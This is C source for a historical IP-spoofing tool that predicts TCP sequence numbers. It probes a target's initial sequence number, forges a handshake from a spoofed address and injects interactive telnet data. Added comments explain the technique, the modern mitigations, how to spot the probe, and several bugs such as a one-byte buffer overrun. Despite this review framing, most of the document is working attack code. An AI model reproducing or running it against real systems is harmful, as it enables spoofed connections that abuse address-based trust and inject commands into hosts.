    ..:-={{Collaborative Security Information Center}}=-:..
    X-TREME & TECHNOTRONIC Security Collaboration Project
http://www.technotronic.com  -=(c)=-  http://www.x-treme.abyss.com


#include "tcpip.c"

#include <fcntl.h>



/* Source port of the tool's own (non-spoofed) probe; main() adds getpid(). */
unsigned long sourceport   = 1036;

/* dest/spoofed/src: IPv4 addresses copied as 4 raw bytes out of sockaddr_in
 * (network byte order, IPv4 only).  nseq: the sequence number predicted for
 * the spoofed connection (observed SYN/ACK sequence + adder).  tarport: target
 * port from atoi(), with no range or parse-error check. */
unsigned long dest, spoofed, src, nseq, tarport, temp;

/* Interactive input line and the fgets() result pointer; fgets() returns NULL
 * on EOF/error and that is never checked before strlen(). */
char str[255], *string;

/* Raw-packet receive buffer; also reused for gethostname(). */
char buf[4096];

/* spoofdir receives "./telnet.d" via strcat(); that literal needs 11 bytes
 * including its terminator, so a 10-byte array is one byte short (overrun
 * into whatever the linker places next).  spoofid: first line of that file. */
char spoofdir[10], *spoofid;

/* First 42 bytes of ./telnet.d.  If read() fills the whole array no NUL is
 * appended before strtok() scans it. */
char spoofbuf[42];

/* adder: the assumed fixed per-connection ISN increment (128000, or 64000 when
 * argv[4] starts with '2').  i: constant 1, passed as the IP_HDRINCL value.
 * rec/sen: raw receive / send descriptors. */
int len, rec, sen, i=1, adder=128000, stringlen=0;

/* Descriptor and byte count for ./telnet.d; spooflen is never checked. */
int spooffd, spooflen;

/* Target address and the address the tool claims to be sending from. */
struct sockaddr_in addr, spoofedaddr;

struct hostent *host;



/*
 * Historical (1990s) proof-of-concept of blind TCP sequence-number
 * prediction behind a forged source address.  As written it
 *   1. probes the target from the real address (SYN, read the SYN/ACK's
 *      sequence number, RST) to learn the current ISN;
 *   2. guesses the next ISN by adding a fixed increment (128000 or 64000);
 *   3. sends SYN, then ACK, then data from the spoofed address against that
 *      guess without ever reading a reply.
 * Both preconditions are removed in modern deployments: ISNs are randomized
 * (RFC 6528) and ingress filtering (BCP 38) drops packets whose source does
 * not belong to the originating network.  For detection the probe is
 * distinctive: a SYN/RST pair from one host immediately followed by a
 * connection from another host that never completes a normal handshake.
 *
 * Code-level review notes (behavior left as-is): `void main` is
 * non-standard (should return int); argv values are used without validation;
 * the first raw send socket is overwritten and leaked; several printf
 * conversion specifiers do not match their argument types; NULL returns from
 * fgets()/strtok() reach strlen().  Requires raw-socket privilege.
 */
void main(int argc, char *argv[])

{

        /* The tool's own ISN for the probe and the spoofed session; getpid()
         * only varies it between runs. */
        unsigned long fakesequence = 408618+getpid();

        sourceport+=getpid();



        printf("Telnet sequence - writtin by vect0rx.\n\n");

        

        if (argc != 5) {

                fprintf(stderr,"Usage: %s <server> <port> <spoof> {1|2}\n\n",argv[0]);

                fprintf(stderr,"                <server> - Site spoof is attempted on.\n");

                fprintf(stderr,"                  <port> - Port to access on <server>.\n");

                fprintf(stderr,"                 <spoof> - Host to appear from.\n");

                fprintf(stderr,"                       1 - Offset of 128000 (common).\n");

                fprintf(stderr,"                       2 - Offset of 64000 (not likely).\n\n");

                exit(1);

        }

        /* atoi() gives no error indication; a non-numeric port becomes 0. */
        tarport = atoi(argv[2]);

        /* Only the first character is inspected; anything but '2' keeps 128000. */
        if (argv[4][0] == '2') adder=64000;



        /* Resolve the address the packets will claim to come from.  inet_addr()
         * returns in_addr_t (unsigned); the == -1 compare relies on the implicit
         * conversion to INADDR_NONE and cannot distinguish 255.255.255.255. */
        memset(&spoofedaddr,0,sizeof(spoofedaddr));

        spoofedaddr.sin_family = AF_INET;

        if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[3])) == -1) {

                if ((host = gethostbyname(argv[3])) == NULL) {

                        printf("Unknown host %s.\n",argv[3]);

                        exit(1);

                }

                /* h_addrtype/h_length are trusted as AF_INET/4 without a check. */
                spoofedaddr.sin_family = host->h_addrtype;

                memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length);

        }

        /* Raw 4-byte copy: the address is kept in network byte order. */
        memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4);



        /* Same resolution sequence for the target. */
        memset(&addr,0,sizeof(addr));

        addr.sin_family = AF_INET;

        if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) {

                if ((host = gethostbyname(argv[1])) == NULL) {

                        printf("Unknown host %s.\n",argv[1]);

                        exit(1);

                }

                addr.sin_family = host->h_addrtype;

                memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length);

        }

        memcpy(&dest,(char *)&addr.sin_addr.s_addr,4);



        /* Raw TCP receive socket (privileged); every inbound TCP segment is
         * delivered here and filtered by hand in the loop below. */
        if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {

                perror("error: recv socket");

                exit(1);

        }



        if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {

                perror("error: send socket");

                exit(1);

        }



        /* The descriptor just created is overwritten here and never closed
         * (fd leak).  openintf() is presumably defined in tcpip.c (not visible
         * in this file); the interface name is hard-coded. */
        sen = openintf("ppp0");



#ifdef IP_HDRINCL

        /* Applied to whatever openintf() returned, not to the raw socket above. */
        fprintf(stderr,"IP_HDRINCL is set\n");

        if (setsockopt(sen,IPPROTO_IP,IP_HDRINCL,(char *)&i,sizeof(i)) < 0) {

                perror("setsockopt IP_HDRINCL");

                exit(1);

        };

#endif



        /* Local address: hostname -> first A record, assumed to be IPv4.
         * buf is 4096 bytes so the 128 limit is safe; the return value of
         * gethostname() is not checked. */
        gethostname(buf, 128);

        if ((host=gethostbyname(buf))==NULL) {

                fprintf(stderr, "Can't get my hostname!?\n");

                exit(1);

        }

        memcpy(&src,host->h_addr,4);





        /* Step 1: probe from the real address to observe the target's current
         * ISN.  sendtcppacket() comes from tcpip.c. */
        sendtcppacket(sen, src, dest, &addr, TH_SYN, sourceport,

                        tarport, fakesequence, 0, NULL, 0);



        for (;;) {

            /* ip and tcp are not declared in this file (presumably tcpip.c). */
            gettcppacket(rec,buf,sizeof(buf));

            ip = (struct iphdr *) buf;

            /* Both sides are raw network-order words, so the compare is consistent. */
            if (ip->saddr != dest) continue;

            len = ip->ihl << 2;

            tcp = (struct tcphdr *) (buf+len);

            if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) {

                    /* htonl() where ntohl() is meant; same result for a 32-bit
                     * byte swap, but misleading. */
                    temp=htonl(tcp->th_seq);

                    nseq=temp; 

                    /* Step 2: the prediction is "observed ISN + fixed increment". */
                    nseq+=adder;

                    /* %lu with an int argument (adder) is a specifier mismatch. */
                    printf("Sequence returned is %lu, Offset is %lu\n",

                                nseq, adder);

                    /* Tear down the probe so it does not linger half-open. */
                    sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport,

                                        tarport, fakesequence, 0, NULL, 0);

                    break; /* out of for loop */

            }

        }

        

        /* Step 3: blind handshake from the spoofed address.  No reply is read;
         * the fixed usleep() delays are the only pacing. */
        sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sourceport,

                        tarport,fakesequence,0,NULL,0);

        printf("SYN Devilered, Waiting on SYN/ACK reply.\n"); fflush(stdout);

        usleep(10000);

        

        /* The ACK acknowledges the guessed ISN + 1; if the guess is wrong the
         * target simply discards it and nothing here notices. */
        sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sourceport,

                        tarport,++fakesequence,++nseq,NULL,0);

        printf("ACK Devilered, Assuming safe to send data.\n"); fflush(stdout);

        usleep(5000);



        printf("Sending irc client handshake.\n"); fflush(stdout);

            

                    /* "./telnet.d" is 11 bytes with its NUL; spoofdir holds 10,
                     * so this strcat() writes one byte past the array. */
                    strcat(spoofdir, "./telnet.d");

                    spooffd = open(spoofdir, O_RDONLY);

                     if (spooffd < 0) {

                        perror("open: ");

                        /* exit(0) reports success for a failure path. */
                        exit(0);

                    }

                        else

                    {   

                        /* Return value unchecked (-1 on error); a full 42-byte read
                         * leaves no terminator for strtok() to stop on. */
                        spooflen = read(spooffd, spoofbuf, sizeof(spoofbuf));

                        /* NULL when the file has no token; strlen(NULL) below is UB. */
                        spoofid = strtok(spoofbuf, "\r\n");

                }

        stringlen = strlen(spoofid);

        /* First data segment: the file's first line as payload. */
        sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport,

                        tarport,fakesequence,nseq,spoofid,stringlen);

        fakesequence+=stringlen;



        /* Interactive loop with no exit condition.  fgets() returns NULL on
         * EOF, which then reaches strlen(); the trailing newline is sent as
         * part of the payload. */
        for(;;) {

            printf("telnet:%s> ", argv[1]); fflush(stdout);

            string = fgets(str, 255, stdin); 

            stringlen = strlen(string);

          

            sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport,

                        tarport,fakesequence,nseq,string,stringlen);

            fakesequence+=stringlen;

        }



}

/*

*/

